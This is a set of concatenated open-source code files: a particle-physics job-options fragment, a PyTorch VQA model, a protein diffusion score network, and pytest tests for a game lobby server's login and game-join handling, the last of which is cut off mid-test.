                                    # "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v27/OutputPlots_MMRates_25ns_v27",
                                    # "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v27/OutputPlots_MMRates_TTWx2_25ns_v27",
                                    # "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v27_v2/OutputPlots_MMClosureRates_25ns_v27", # Closure
                                    #
                                    # ------------------------------------------------------------
                                    #
                                    # v28
                                    #
                                    # "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v28/OutputPlots_MMRates_25ns_v28",
                                    # "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v28/OutputPlots_MMRates_25ns_v28_NewBinning",
                                    #
                                    # "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v28/OutputPlots_MMRates_25ns_v28_FINAL_BINNING_2",
                                    # "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v28/OutputPlots_MMClosureRates_25ns_v28_FINAL_BINNING_2", # Closure
                                    #
                                    # ------------------------------------------------------------
                                    #
                                    # v29
                                    #
                                    "m_REFF_dir" : base_dir + "HTopMultilepAnalysis/PlotUtils/PLOTS_25ns_v29/OutputPlots_MMRates_25ns_v29",
                                    #
                                    # ------------------------------------------------------------
                                    #
                                    # "m_parametrisation_list" : "Real_El:Pt,Real_Mu:Pt,Fake_El:Pt,Fake_Mu:Pt",
                                    # "m_parametrisation_list" : "Real_El:Pt,Real_Mu:Pt,Fake_El:PtxEta,Fake_Mu:Pt",
                                    # "m_parametrisation_list" : "Real_El:Pt,Real_Mu:Pt,Fake_El:NBJets_VS_Pt,Fake_Mu:Pt",
                                    # "m_parametrisation_list" : "Real_El:Pt,Real_Mu:DistanceClosestJet_VS_Pt,Fake_El:NBJets_VS_Pt,Fake_Mu:Pt",
                                    "m_parametrisation_list" : "Real_El:Pt,Real_Mu:Pt,Fake_El:NBJets_VS_Pt,Fake_Mu:DistanceClosestJet_VS_Pt",
                                    "m_useScaledFakeElEfficiency_ElEl" : True,
                                    #
                                    # "m_systematics_list" : "Nominal:",
                                    # "m_systematics_list" : "Nominal:,Stat:UncorrBins",
                                    "m_systematics_list" : "Nominal:,Stat:UncorrBins,ND_TTV:CorrBins,ND_VV:CorrBins,ND_OtherPromptSS:CorrBins,ND_FakesOS:CorrBins,N_QMisID:UncorrBins,D_QMisID:UncorrBins",
                                    "m_correlatedMMWeights" : False,
                                    #
                                    "m_useTrigMatchingInfo" : False,
                                    #
                                    # "m_Efficiency_Filename" : "LeptonEfficiencies.root",
                                    # "m_Efficiency_Filename" : "LeptonEfficiencies_physics_Main_FixedRescaling_25_07_17.root",
                                    "m_Efficiency_Filename" : "LeptonEfficiencies_physics_Main_FixedRescaling_26_07_17.root",
                                    # "m_Efficiency_Filename" : "LeptonEfficiencies_physics_Main_FixedRescaling_29_07_17.root",
                                    # "m_Efficiency_Filename" : "LeptonEfficiencies_FakeElPtRescaledPhConv.root",
                                    # "m_Efficiency_Filename" : "LeptonEfficiencies_RealMuDistanceClosestJetVSPt.root",
                                    #
                                    "m_doMMClosure"    : False,
                                    "m_useTEfficiency" : False,
                                  }
# Instantiate the NTupleSvc algorithm on the same output stream the
# reprocesser writes to.
ntuplesvc = ROOT.EL.NTupleSvc(HTopMultilepNTupReprocesserDict["m_outputNTupStreamName"])

# Copy ALL branches over from the input TTree
print("Copying all branches from input TTree to output...")
ntuplesvc.copyBranch(".*")

# Add the algorithms to the job.
#
# Here order matters! NTupleSvc must run before the reprocesser.
c._algorithms.append(ntuplesvc)
c.setalg("HTopMultilepNTupReprocesser", HTopMultilepNTupReprocesserDict)
| mmilesi/HTopMultilepAnalysis | scripts/jobOptions_HTopMultilepNTupReprocesser.py | jobOptions_HTopMultilepNTupReprocesser.py | py | 9,263 | python | en | code | 0 | github-code | 36 |
6200744085 | import torch
import torch.nn as nn
from attention import NewAttention
from language_model import (
WordEmbedding,
QuestionEmbedding,
TemporalConvNet,
BertEmbedding,
)
from classifier import SimpleClassifier
from fc import FCNet
class BaseModel(nn.Module):
    """Bottom-up/top-down style VQA model.

    Pipeline: word embedding -> question encoder -> visual attention over
    object features -> joint (elementwise product) representation -> answer
    classifier.
    """

    def __init__(self, w_emb, q_emb, v_att, q_net, v_net, classifier):
        super(BaseModel, self).__init__()
        # Sub-modules are supplied by the builder so encoders are swappable.
        self.w_emb = w_emb
        self.q_emb = q_emb
        self.v_att = v_att
        self.q_net = q_net
        self.v_net = v_net
        self.classifier = classifier

    def forward(self, v, q, attention_output=False):
        """Compute answer logits.

        v: [batch, num_objs, obj_dim] visual features
        q: [batch_size, seq_length] tokenized question
        attention_output: when True, also return the attention weights.
        return: logits (not probs), optionally with the attention map
        """
        question_repr = self.q_emb(self.w_emb(q))  # [batch, q_dim]
        att = self.v_att(v, question_repr)
        # Attention-weighted sum over objects yields one visual vector.
        attended_visual = (att * v).sum(1)  # [batch, v_dim]
        joint = self.q_net(question_repr) * self.v_net(attended_visual)
        logits = self.classifier(joint)
        return (logits, att) if attention_output else logits
def build_baseline0_newatt(
    dataset,
    num_hid,
    bidirectional=False,
    emb_dim=300,
    w_emb_type="baseline",
    rnn_type="GRU",
    activation=nn.ReLU,
    rnn_init=False,
    relu_init=False,
    var_analysis=False,
):
    """Build the baseline VQA model with the "new attention" module.

    Args:
        dataset: provides `dictionary.ntoken`, `v_dim` and
            `num_ans_candidates` used to size the sub-modules.
        num_hid: hidden size of the question encoder / joint space.
        bidirectional: if True, the joint hidden size is doubled.
        emb_dim: word embedding dimension (ignored for BERT embeddings).
        w_emb_type: "BERT" or "baseline" word embeddings.
        rnn_type: "TCN" for a temporal conv net, else passed to
            QuestionEmbedding (e.g. "GRU").
        activation: activation class used throughout.
        rnn_init / relu_init / var_analysis: flags forwarded to sub-modules.

    Returns:
        A ready-to-train BaseModel instance.
    """
    if w_emb_type == "BERT":
        w_emb = BertEmbedding(0.0)
    else:
        w_emb = WordEmbedding(dataset.dictionary.ntoken, emb_dim, 0.0)
    if rnn_type == "TCN":
        # NOTE(review): 14 is presumably the max question length and 300 the
        # word-embedding width — confirm against the TCN implementation.
        q_emb = TemporalConvNet(14, [14] * 2, num_hid, kernel_size=(3, 300))
    else:
        q_emb = QuestionEmbedding(
            emb_dim,
            num_hid,
            1,
            bidirectional,
            0.0,
            rnn_type=rnn_type,
            personalized_init=rnn_init,
        )
    num_hid = num_hid * 2 if bidirectional else num_hid  # to double number of params
    v_att = NewAttention(dataset.v_dim, q_emb.out_size, num_hid, activation=activation)
    # Project question and visual features into the same joint space.
    q_net = FCNet(
        [q_emb.out_size, num_hid],
        activation,
        relu_init=relu_init,
        var_analysis=var_analysis,
        name="q_net",
    )
    v_net = FCNet(
        [dataset.v_dim, num_hid],
        activation,
        relu_init=relu_init,
        var_analysis=var_analysis,
        name="v_net",
    )
    classifier = SimpleClassifier(
        num_hid, num_hid * 2, dataset.num_ans_candidates, 0.5, activation
    )
    return BaseModel(w_emb, q_emb, v_att, q_net, v_net, classifier)
| cliziam/VQA_project_Demo | demo-vqa-webcam/base_model.py | base_model.py | py | 2,732 | python | en | code | 0 | github-code | 36 |
28890245799 | """Score network module."""
import torch
import copy
import math
from torch import nn
from torch.nn import functional as F
from openfold.utils.rigid_utils import Rigid, Rotation
from data import utils as du
from data import all_atom
from model import ipa_pytorch
from motif_scaffolding import twisting
import functools as fn
Tensor = torch.Tensor
def get_index_embedding(indices, embed_size, max_len=2056):
    """Sine/cosine positional embeddings for integer index offsets.

    Args:
        indices: offsets of size [..., N_edges] of type integer
        embed_size: dimension of the embeddings to create (split evenly
            between the sine and cosine halves)
        max_len: maximum length used to scale the frequencies

    Returns:
        positional embedding of shape [..., N, embed_size]
    """
    k = torch.arange(embed_size // 2).to(indices.device)
    # One frequency per embedding channel pair, Transformer-style.
    denom = max_len ** (2 * k[None] / embed_size)
    angles = indices[..., None] * math.pi / denom
    return torch.cat([torch.sin(angles), torch.cos(angles)], axis=-1)
def get_timestep_embedding(timesteps, embedding_dim, max_positions=10000):
    """Sinusoidal timestep embeddings (Transformer-style).

    Code adapted from
    https://github.com/hojonathanho/diffusion/blob/master/diffusion_tf/nn.py

    Args:
        timesteps: 1-D tensor of timesteps (in [0, 1]; scaled by max_positions).
        embedding_dim: size of the returned embedding's last dimension.
        max_positions: frequency scale of the sinusoids.

    Returns:
        Tensor of shape [len(timesteps), embedding_dim].

    Raises:
        ValueError: if `timesteps` is not 1-D.
    """
    # Explicit check instead of `assert`, which is stripped under `python -O`.
    if len(timesteps.shape) != 1:
        raise ValueError(f"timesteps must be 1-D, got shape {tuple(timesteps.shape)}")
    timesteps = timesteps * max_positions
    half_dim = embedding_dim // 2
    # max(half_dim - 1, 1) avoids ZeroDivisionError for embedding_dim in {2, 3}
    # (half_dim == 1); for larger dims this matches the reference code exactly.
    emb = math.log(max_positions) / max(half_dim - 1, 1)
    emb = torch.exp(torch.arange(half_dim, dtype=torch.float32, device=timesteps.device) * -emb)
    emb = timesteps.float()[:, None] * emb[None, :]
    emb = torch.cat([torch.sin(emb), torch.cos(emb)], dim=1)
    if embedding_dim % 2 == 1:  # zero pad the odd final channel
        emb = F.pad(emb, (0, 1), mode='constant')
    return emb
class Embedder(nn.Module):
    """Builds the initial per-residue (node) and per-pair (edge) embeddings.

    Combines timestep embeddings, the fixed-residue mask, positional index
    embeddings and (optionally) a self-conditioning Ca distogram, then
    projects them with small MLPs.
    """

    def __init__(self, model_conf):
        super(Embedder, self).__init__()
        self._model_conf = model_conf
        self._embed_conf = model_conf.embed

        # Time step embedding (+1 channel for the fixed-residue mask).
        index_embed_size = self._embed_conf.index_embed_size
        t_embed_size = index_embed_size
        node_embed_dims = t_embed_size + 1
        edge_in = (t_embed_size + 1) * 2

        # Sequence index embedding
        node_embed_dims += index_embed_size
        edge_in += index_embed_size

        node_embed_size = self._model_conf.node_embed_size
        self.node_embedder = nn.Sequential(
            nn.Linear(node_embed_dims, node_embed_size),
            nn.ReLU(),
            nn.Linear(node_embed_size, node_embed_size),
            nn.ReLU(),
            nn.Linear(node_embed_size, node_embed_size),
            nn.LayerNorm(node_embed_size),
        )

        if self._embed_conf.embed_self_conditioning:
            edge_in += self._embed_conf.num_bins
        edge_embed_size = self._model_conf.edge_embed_size
        self.edge_embedder = nn.Sequential(
            nn.Linear(edge_in, edge_embed_size),
            nn.ReLU(),
            nn.Linear(edge_embed_size, edge_embed_size),
            nn.ReLU(),
            nn.Linear(edge_embed_size, edge_embed_size),
            nn.LayerNorm(edge_embed_size),
        )

        self.timestep_embedder = fn.partial(
            get_timestep_embedding,
            embedding_dim=self._embed_conf.index_embed_size
        )
        self.index_embedder = fn.partial(
            get_index_embedding,
            embed_size=self._embed_conf.index_embed_size
        )

    def _cross_concat(self, feats_1d, num_batch, num_res):
        # Tile node features into all (i, j) pairs: [B, N*N, 2*D].
        return torch.cat([
            torch.tile(feats_1d[:, :, None, :], (1, 1, num_res, 1)),
            torch.tile(feats_1d[:, None, :, :], (1, num_res, 1, 1)),
        ], dim=-1).float().reshape([num_batch, num_res**2, -1])

    def forward(
            self,
            *,
            seq_idx,
            t,
            fixed_mask,
            self_conditioning_ca,
        ):
        """Embeds a set of inputs

        Args:
            seq_idx: [..., N] Positional sequence index for each residue.
            t: Sampled t in [0, 1].
            fixed_mask: mask of fixed (motif) residues.
            self_conditioning_ca: [..., N, 3] Ca positions of self-conditioning
                input.

        Returns:
            node_embed: [B, N, D_node]
            edge_embed: [B, N, N, D_edge]

        Raises:
            ValueError: if the node embeddings contain NaNs.
        """
        num_batch, num_res = seq_idx.shape

        # Append the fixed-residue mask as an extra feature channel so the
        # network can distinguish motif residues from diffused ones.
        fixed_mask = fixed_mask[..., None]
        prot_t_embed = torch.tile(
            self.timestep_embedder(t)[:, None, :], (1, num_res, 1))
        prot_t_embed = torch.cat([prot_t_embed, fixed_mask], dim=-1)
        node_feats = [prot_t_embed]
        pair_feats = [self._cross_concat(prot_t_embed, num_batch, num_res)]

        # Positional index features.
        node_feats.append(self.index_embedder(seq_idx))
        rel_seq_offset = seq_idx[:, :, None] - seq_idx[:, None, :]
        rel_seq_offset = rel_seq_offset.reshape([num_batch, num_res**2])
        pair_feats.append(self.index_embedder(rel_seq_offset))

        # Self-conditioning distogram.
        if self._embed_conf.embed_self_conditioning:
            sc_dgram = du.calc_distogram(
                self_conditioning_ca,
                self._embed_conf.min_bin,
                self._embed_conf.max_bin,
                self._embed_conf.num_bins,
            )
            pair_feats.append(sc_dgram.reshape([num_batch, num_res**2, -1]))

        node_embed = self.node_embedder(torch.cat(node_feats, dim=-1).float())
        edge_embed = self.edge_embedder(torch.cat(pair_feats, dim=-1).float())
        edge_embed = edge_embed.reshape([num_batch, num_res, num_res, -1])
        if torch.any(node_embed.isnan()):
            # Fail fast instead of dropping into a debugger; the original code
            # left an `import ipdb; ipdb.set_trace()` breakpoint here, which
            # hangs non-interactive runs and requires a non-installed package.
            raise ValueError("Embedder produced NaN node embeddings")
        return node_embed, edge_embed
class ScoreNetwork(nn.Module):
    """SE(3) diffusion score network (embedder + IPA trunk), with optional
    twisting for motif-scaffolding conditional sampling."""

    def __init__(self, model_conf, diffuser):
        super(ScoreNetwork, self).__init__()
        self._model_conf = model_conf
        self.embedding_layer = Embedder(model_conf)
        self.diffuser = diffuser
        self.score_model = ipa_pytorch.IpaScore(model_conf, diffuser)

    def _apply_mask(self, aatype_diff, aatype_0, diff_mask):
        # Blend: diffused value where mask == 1, original value where mask == 0.
        return diff_mask * aatype_diff + (1 - diff_mask) * aatype_0

    def forward(self, input_feats, F=None,
                use_twisting=False, twist_scale=1.,
                twist_potential_rot=True,
                twist_potential_trans=True,
                twist_update_rot=True,
                twist_update_trans=True,
                ):
        """Forward computes the reverse diffusion conditionals p(X^t|X^{t+1})
        for each item in the batch

        Args:
            input_feats: dict of noised sample features (res_mask, fixed_mask,
                seq_idx, t, sc_ca_t, torsion_angles_sin_cos, R_t, ...).
            F: feature map forwarded to `twisting.grad_log_lik_approx`.
                NOTE(review): this parameter shadows the module-level
                `torch.nn.functional as F` inside this method — confirm
                that nothing here needs `torch.nn.functional`.
            use_twisting: enable conditional (motif) score corrections.
                NOTE(review): `Log_delta_R`/`delta_x` are only bound when
                "rigids_motif" is present; calling with use_twisting=True
                and no "rigids_motif" key raises NameError (pre-existing).

        Returns:
            pred_out: dictionary of model outputs (psi_pred, rot_score,
            trans_score, rigids, plus twisting diagnostics when enabled).
        """
        # Frames as [batch, res, 7] tensors.
        bb_mask = input_feats['res_mask'].type(torch.float32)  # [B, N]
        fixed_mask = input_feats['fixed_mask'].type(torch.float32)
        edge_mask = bb_mask[..., None] * bb_mask[..., None, :]

        # Initial embeddings of positional and relative indices.
        init_node_embed, init_edge_embed = self.embedding_layer(
            seq_idx=input_feats['seq_idx'],
            t=input_feats['t'],
            fixed_mask=fixed_mask,
            self_conditioning_ca=input_feats['sc_ca_t'],
        )
        edge_embed = init_edge_embed * edge_mask[..., None]
        node_embed = init_node_embed * bb_mask[..., None]
        if torch.any(node_embed.isnan()):
            # Fail fast instead of dropping into a debugger; the original code
            # left an `import ipdb; ipdb.set_trace()` breakpoint here.
            raise ValueError("node_embed contains NaN values")

        # If input_feats has conditioning information, update input rigids to track gradients
        if use_twisting and "rigids_motif" in input_feats:
            Log_delta_R, delta_x = twisting.perturbations_for_grad(input_feats, self.diffuser)

        # Run main network
        model_out = self.score_model(node_embed, edge_embed, input_feats)

        # Psi angle prediction
        gt_psi = input_feats['torsion_angles_sin_cos'][..., 2, :]
        psi_pred = self._apply_mask(
            model_out['psi'], gt_psi, 1 - fixed_mask[..., None])

        pred_out = {'psi_pred': psi_pred}
        pred_out['rot_score'] = model_out['rot_score']
        pred_out['trans_score'] = model_out['trans_score']
        final_rigids = Rigid(Rotation(model_out['R_final']), model_out['trans_final'])
        model_out['final_rigids'] = final_rigids
        rigids_pred = model_out['final_rigids']
        pred_out['rigids'] = rigids_pred.to_tensor_7()

        # If input_feats has conditioning information, compute conditional score
        if use_twisting:
            grad_R_log_p_motif, grad_x_log_p_motif, max_log_p_idx, twist_log_p = twisting.grad_log_lik_approx(
                R_t=input_feats['R_t'],
                R_pred=model_out['R_final'],
                trans_pred=model_out['trans_final'],
                motif_tensor_7=input_feats['rigids_motif'],
                Log_delta_R=Log_delta_R, delta_x=delta_x,
                se3_diffuser=self.diffuser,
                t=input_feats['t'],
                F=F,
                twist_scale=twist_scale,
                twist_potential_rot=twist_potential_rot,
                twist_potential_trans=twist_potential_trans,
            )
            pred_out['max_log_p_idx'] = max_log_p_idx
            pred_out['twist_log_p'] = twist_log_p

            verbose = False
            if verbose:
                # Log the mean norms of the conditional vs unconditional gradients.
                grad_R_log_p_motif_norm = torch.norm(grad_R_log_p_motif, dim=[-2, -1]).mean()
                grad_x_log_p_motif_norm = torch.norm(grad_x_log_p_motif, dim=[-1]).mean()
                print("input_feats[t]: ", input_feats['t'])
                print("grad_R_log_p_motif_norm: ", grad_R_log_p_motif_norm)
                print("grad_x_log_p_motif_norm: ", grad_x_log_p_motif_norm)
                grad_R_uncond = pred_out['rot_score']
                grad_x_uncond = pred_out['trans_score']
                grad_R_uncond_norm = torch.norm(grad_R_uncond, dim=[-2, -1]).mean()
                grad_x_uncond_norm = torch.norm(grad_x_uncond, dim=[-1]).mean()
                print("grad_R_uncond_norm: ", grad_R_uncond_norm)
                print("grad_x_uncond_norm: ", grad_x_uncond_norm)

            # Zero out any NaN rotation gradients so one bad residue does not
            # poison the whole update.
            if sum(torch.isnan(grad_R_log_p_motif).flatten()) > 0:
                num_nans = sum(torch.isnan(grad_R_log_p_motif).flatten())
                print("grad_R_log_p_motif has ", num_nans, " nans")
                # first find indices corresponding to nans
                nan_indices = torch.where(torch.isnan(grad_R_log_p_motif[0]).sum(dim=[-2,-1]))[0]
                # set rotation matrices to zero if they have nans
                grad_R_log_p_motif[0, nan_indices] = 0.

            # Soft-clip the rotation gradient so each 3x3 matrix has Frobenius
            # norm well below max_norm.
            # Consider doing something similar for translations? (i.e. for scaling)
            # TODO: Do ablation to check if this matters! (i.e. if we don't scale the gradients)
            max_norm = 1e3
            norms = torch.norm(grad_R_log_p_motif, dim=[-2, -1], keepdim=True)  # keep the last dimensions
            if sum(norms.flatten() > max_norm) > 0:
                print("norms of grad_R_log_p_motif are ", norms.shape, norms.flatten())
            grad_R_scaling = max_norm / (max_norm + norms)
            grad_R_log_p_motif = grad_R_scaling*grad_R_log_p_motif
            # (Removed a duplicated log line that claimed to report
            # grad_trans_log_p_motif norms but actually re-printed the
            # rotation norms — a copy-paste leftover of the commented-out
            # translation-scaling block.)

            if twist_update_rot:
                pred_out['rot_score_uncond'] = pred_out['rot_score'].detach().clone()
                pred_out['rot_score'] = pred_out['rot_score'] + grad_R_log_p_motif
            if twist_update_trans:
                pred_out['trans_score_uncond'] = pred_out['trans_score'].detach().clone()
                pred_out['trans_score'] = pred_out['trans_score'] + grad_x_log_p_motif
                # Shift the predicted translations by the (unscaled) motif
                # gradient, weighted by the diffusion schedule factor.
                bar_a_t = torch.exp(-self.diffuser._r3_diffuser.marginal_b_t(input_feats['t']))
                factor_on_score_x = (1-bar_a_t)/torch.sqrt(bar_a_t)
                rigids_pred = Rigid.from_tensor_7(pred_out['rigids'])
                pred_out['rigids_uncond'] = pred_out['rigids'].detach().clone()
                x_pred = rigids_pred.get_trans()
                x_pred = x_pred + factor_on_score_x[:, None, None] * self.diffuser._r3_diffuser._unscale(grad_x_log_p_motif)
                rigids_pred._trans = x_pred
                pred_out['rigids'] = rigids_pred.to_tensor_7()

        # Detach tensor inputs so autograd state does not leak to the caller.
        for k, v in input_feats.items():
            # check if a the value is a tensor, and detach if so.
            if isinstance(v, torch.Tensor):
                input_feats[k] = v.detach()

        return pred_out
| blt2114/twisted_diffusion_sampler | protein_exp/model/score_network.py | score_network.py | py | 13,595 | python | en | code | 11 | github-code | 36 |
74060670184 | import re
from hashlib import sha256
from unittest import mock
import pytest
from aiohttp import web
from sqlalchemy import and_, select
from server.config import config
from server.db.models import ban, friends_and_foes
from server.exceptions import BanError, ClientError
from server.game_service import GameService
from server.gameconnection import GameConnection
from server.games import CustomGame, Game, GameState, InitMode, VisibilityState
from server.geoip_service import GeoIpService
from server.ice_servers.nts import TwilioNTS
from server.ladder_service import LadderService
from server.lobbyconnection import LobbyConnection
from server.matchmaker import Search
from server.oauth_service import OAuthService
from server.party_service import PartyService
from server.player_service import PlayerService
from server.players import PlayerState
from server.protocol import DisconnectedError, QDataStreamProtocol
from server.rating import InclusiveRange, RatingType
from server.team_matchmaker import PlayerParty
from server.types import Address
@pytest.fixture()
def test_game_info():
    """Baseline payload for game_host/game_join commands."""
    return {
        "title": "Test game",
        "visibility": VisibilityState.PUBLIC.value,
        "mod": "faf",
        "mapname": "scmp_007",
        "password": None,
        "lobby_rating": 1,
        "options": []
    }
@pytest.fixture()
def test_game_info_invalid():
    """Same payload but with a non-ASCII title, which the server rejects."""
    return {
        "title": "Title with non ASCI char \xc3",
        "visibility": VisibilityState.PUBLIC.value,
        "mod": "faf",
        "mapname": "scmp_007",
        "password": None,
        "lobby_rating": 1,
        "options": []
    }
@pytest.fixture
def mock_player(player_factory):
    """Player with no lobby connection attached."""
    return player_factory("Dummy", player_id=42, lobby_connection_spec=None)
@pytest.fixture
def mock_nts_client():
    """Autospec mock of the Twilio NTS client."""
    return mock.create_autospec(TwilioNTS)
@pytest.fixture
def mock_players():
    """Autospec mock of the PlayerService."""
    return mock.create_autospec(PlayerService)
@pytest.fixture
def mock_games():
    """Autospec mock of the GameService."""
    return mock.create_autospec(GameService)
@pytest.fixture
def mock_protocol():
    """Autospec mock built from a real protocol instance."""
    return mock.create_autospec(QDataStreamProtocol(mock.Mock(), mock.Mock()))
@pytest.fixture
def mock_geoip():
    """Autospec mock of the GeoIpService."""
    return mock.create_autospec(GeoIpService)
@pytest.fixture
def lobbyconnection(
    event_loop,
    database,
    mock_protocol,
    mock_games,
    mock_players,
    mock_player,
    mock_geoip,
    mock_nts_client,
    rating_service
):
    """Pre-authenticated LobbyConnection wired up with mocked services."""
    lc = LobbyConnection(
        database=database,
        geoip=mock_geoip,
        game_service=mock_games,
        players=mock_players,
        nts_client=mock_nts_client,
        ladder_service=mock.create_autospec(LadderService),
        party_service=mock.create_autospec(PartyService),
        oauth_service=mock.create_autospec(OAuthService),
        rating_service=rating_service
    )
    lc.player = mock_player
    lc.protocol = mock_protocol
    lc.player_service.fetch_player_data = mock.AsyncMock()
    lc.peer_address = Address("127.0.0.1", 1234)
    # Skip the auth handshake for tests that exercise other commands.
    lc._authenticated = True
    return lc
@pytest.fixture
def policy_server(event_loop):
    """Local aiohttp stub of the policy server; /verify echoes the uid_hash."""
    host = "localhost"
    port = 6080
    app = web.Application()
    routes = web.RouteTableDef()
    @routes.post("/verify")
    async def token(request):
        data = await request.json()
        return web.json_response({"result": data.get("uid_hash")})
    app.add_routes(routes)
    runner = web.AppRunner(app)
    async def start_app():
        await runner.setup()
        site = web.TCPSite(runner, host, port)
        await site.start()
    event_loop.run_until_complete(start_app())
    # Hand (host, port) to the test; clean up the server afterwards.
    yield (host, port)
    event_loop.run_until_complete(runner.cleanup())
async def test_unauthenticated_calls_abort(lobbyconnection, test_game_info):
    """Non-handshake commands must abort an unauthenticated connection."""
    lobbyconnection._authenticated = False
    lobbyconnection.abort = mock.AsyncMock()
    await lobbyconnection.on_message_received({
        "command": "game_host",
        **test_game_info
    })
    lobbyconnection.abort.assert_called_once_with(
        "Message invalid for unauthenticated connection: game_host"
    )
async def test_bad_command_calls_abort(lobbyconnection):
    """Unknown commands reply with 'invalid' and abort the connection."""
    lobbyconnection.send = mock.AsyncMock()
    lobbyconnection.abort = mock.AsyncMock()
    await lobbyconnection.on_message_received({
        "command": "this_isnt_real"
    })
    lobbyconnection.send.assert_called_once_with({"command": "invalid"})
    lobbyconnection.abort.assert_called_once_with("Error processing command")
async def test_command_pong_does_nothing(lobbyconnection):
    """'pong' is a keep-alive; it must not trigger a reply."""
    lobbyconnection.send = mock.AsyncMock()
    await lobbyconnection.on_message_received({
        "command": "pong"
    })
    lobbyconnection.send.assert_not_called()
async def test_command_create_account_returns_error(lobbyconnection):
    """In-client account creation is retired; server replies with an error notice."""
    lobbyconnection.send = mock.AsyncMock()
    await lobbyconnection.on_message_received({
        "command": "create_account"
    })
    lobbyconnection.send.assert_called_once_with({
        "command": "notice",
        "style": "error",
        "text": ("FAF no longer supports direct registration. "
                 "Please use the website to register.")
    })
async def test_double_login(lobbyconnection, mock_players, player_factory):
    """A second login kicks the first session with a fatal warning."""
    lobbyconnection.check_policy_conformity = mock.AsyncMock(return_value=True)
    old_player = player_factory(lobby_connection_spec="auto")
    old_player.lobby_connection.player = old_player
    mock_players.get_player.return_value = old_player
    await lobbyconnection.on_message_received({
        "command": "hello",
        "login": "test",
        "password": sha256(b"test_password").hexdigest(),
        "unique_id": "blah"
    })
    old_player.lobby_connection.write_warning.assert_called_with(
        "You have been signed out because you signed in elsewhere.",
        fatal=True,
        style="kick"
    )
    # This should only be reset in abort, which is mocked for this test
    assert old_player.lobby_connection.player is not None
async def test_double_login_disconnected(lobbyconnection, mock_players, player_factory):
    """A dead previous session must not make the new login blow up."""
    lobbyconnection.abort = mock.AsyncMock()
    lobbyconnection.check_policy_conformity = mock.AsyncMock(return_value=True)
    old_player = player_factory(lobby_connection_spec="auto")
    mock_players.get_player.return_value = old_player
    old_player.lobby_connection.send_warning.side_effect = DisconnectedError("Test disconnect")
    # Should not raise
    await lobbyconnection.on_message_received({
        "command": "hello",
        "login": "test",
        "password": sha256(b"test_password").hexdigest(),
        "unique_id": "blah"
    })
    lobbyconnection.abort.assert_not_called()
async def test_command_game_host_creates_game(
    lobbyconnection, mock_games, test_game_info, players
):
    """game_host forwards the expected kwargs to GameService.create_game."""
    players.hosting.state = PlayerState.IDLE
    lobbyconnection.player = players.hosting
    await lobbyconnection.on_message_received({
        "command": "game_host",
        **test_game_info
    })
    expected_call = {
        "game_mode": "faf",
        "game_class": CustomGame,
        "name": test_game_info["title"],
        "host": players.hosting,
        "visibility": VisibilityState.PUBLIC,
        "password": test_game_info["password"],
        "mapname": test_game_info["mapname"],
        "rating_type": RatingType.GLOBAL,
        "displayed_rating_range": InclusiveRange(None, None),
        "enforce_rating_range": False
    }
    mock_games.create_game.assert_called_with(**expected_call)
async def test_launch_game(lobbyconnection, game, player_factory):
    """launch_game wires the player and a fresh game connection together."""
    old_game_conn = mock.create_autospec(GameConnection)
    lobbyconnection.player = player_factory()
    lobbyconnection.game_connection = old_game_conn
    lobbyconnection.send = mock.AsyncMock()
    await lobbyconnection.launch_game(game)
    # Verify all side effects of launch_game here
    old_game_conn.abort.assert_called_with("Player launched a new game")
    assert lobbyconnection.game_connection is not None
    assert lobbyconnection.game_connection.game == game
    assert lobbyconnection.player.game == game
    assert lobbyconnection.player.game_connection == lobbyconnection.game_connection
    assert lobbyconnection.game_connection.player == lobbyconnection.player
    assert lobbyconnection.player.state == PlayerState.IDLE
    lobbyconnection.send.assert_called_once()
async def test_command_game_host_creates_correct_game(
        lobbyconnection, game_service, test_game_info, players):
    """game_host with the real GameService launches a CustomGame."""
    lobbyconnection.player = players.hosting
    players.hosting.state = PlayerState.IDLE
    lobbyconnection.game_service = game_service
    lobbyconnection.launch_game = mock.AsyncMock()
    await lobbyconnection.on_message_received({
        "command": "game_host",
        **test_game_info
    })
    args_list = lobbyconnection.launch_game.call_args_list
    assert len(args_list) == 1
    args, kwargs = args_list[0]
    assert isinstance(args[0], CustomGame)
async def test_command_game_join_calls_join_game(
    mocker,
    database,
    lobbyconnection,
    game_service,
    test_game_info,
    players,
    game_stats_service
):
    """Joining an open, unpassworded game replies with game_launch."""
    lobbyconnection.send = mock.AsyncMock()
    lobbyconnection.game_service = game_service
    game = Game(42, database, game_service, game_stats_service)
    game.state = GameState.LOBBY
    game.password = None
    game.game_mode = "faf"
    game.id = 42
    game.name = "Test Game Name"
    game.host = players.hosting
    game_service._games[42] = game
    lobbyconnection.player = players.joining
    players.joining.state = PlayerState.IDLE
    test_game_info["uid"] = 42
    await lobbyconnection.on_message_received({
        "command": "game_join",
        **test_game_info
    })
    expected_reply = {
        "command": "game_launch",
        "args": ["/numgames", players.hosting.game_count[RatingType.GLOBAL]],
        "uid": 42,
        "mod": "faf",
        "name": "Test Game Name",
        "init_mode": InitMode.NORMAL_LOBBY.value,
        "game_type": "custom",
        "rating_type": "global",
    }
    lobbyconnection.send.assert_called_with(expected_reply)
async def test_command_game_join_uid_as_str(
    mocker,
    database,
    lobbyconnection,
    game_service,
    test_game_info,
    players,
    game_stats_service
):
    """A string uid must be coerced to int and still join the game."""
    lobbyconnection.send = mock.AsyncMock()
    lobbyconnection.game_service = game_service
    game = Game(42, database, game_service, game_stats_service)
    game.state = GameState.LOBBY
    game.password = None
    game.game_mode = "faf"
    game.id = 42
    game.name = "Test Game Name"
    game.host = players.hosting
    game_service._games[42] = game
    lobbyconnection.player = players.joining
    players.joining.state = PlayerState.IDLE
    test_game_info["uid"] = "42"  # Pass in uid as string
    await lobbyconnection.on_message_received({
        "command": "game_join",
        **test_game_info
    })
    expected_reply = {
        "command": "game_launch",
        "args": ["/numgames", players.hosting.game_count[RatingType.GLOBAL]],
        "mod": "faf",
        "uid": 42,
        "name": "Test Game Name",
        "init_mode": InitMode.NORMAL_LOBBY.value,
        "game_type": "custom",
        "rating_type": "global",
    }
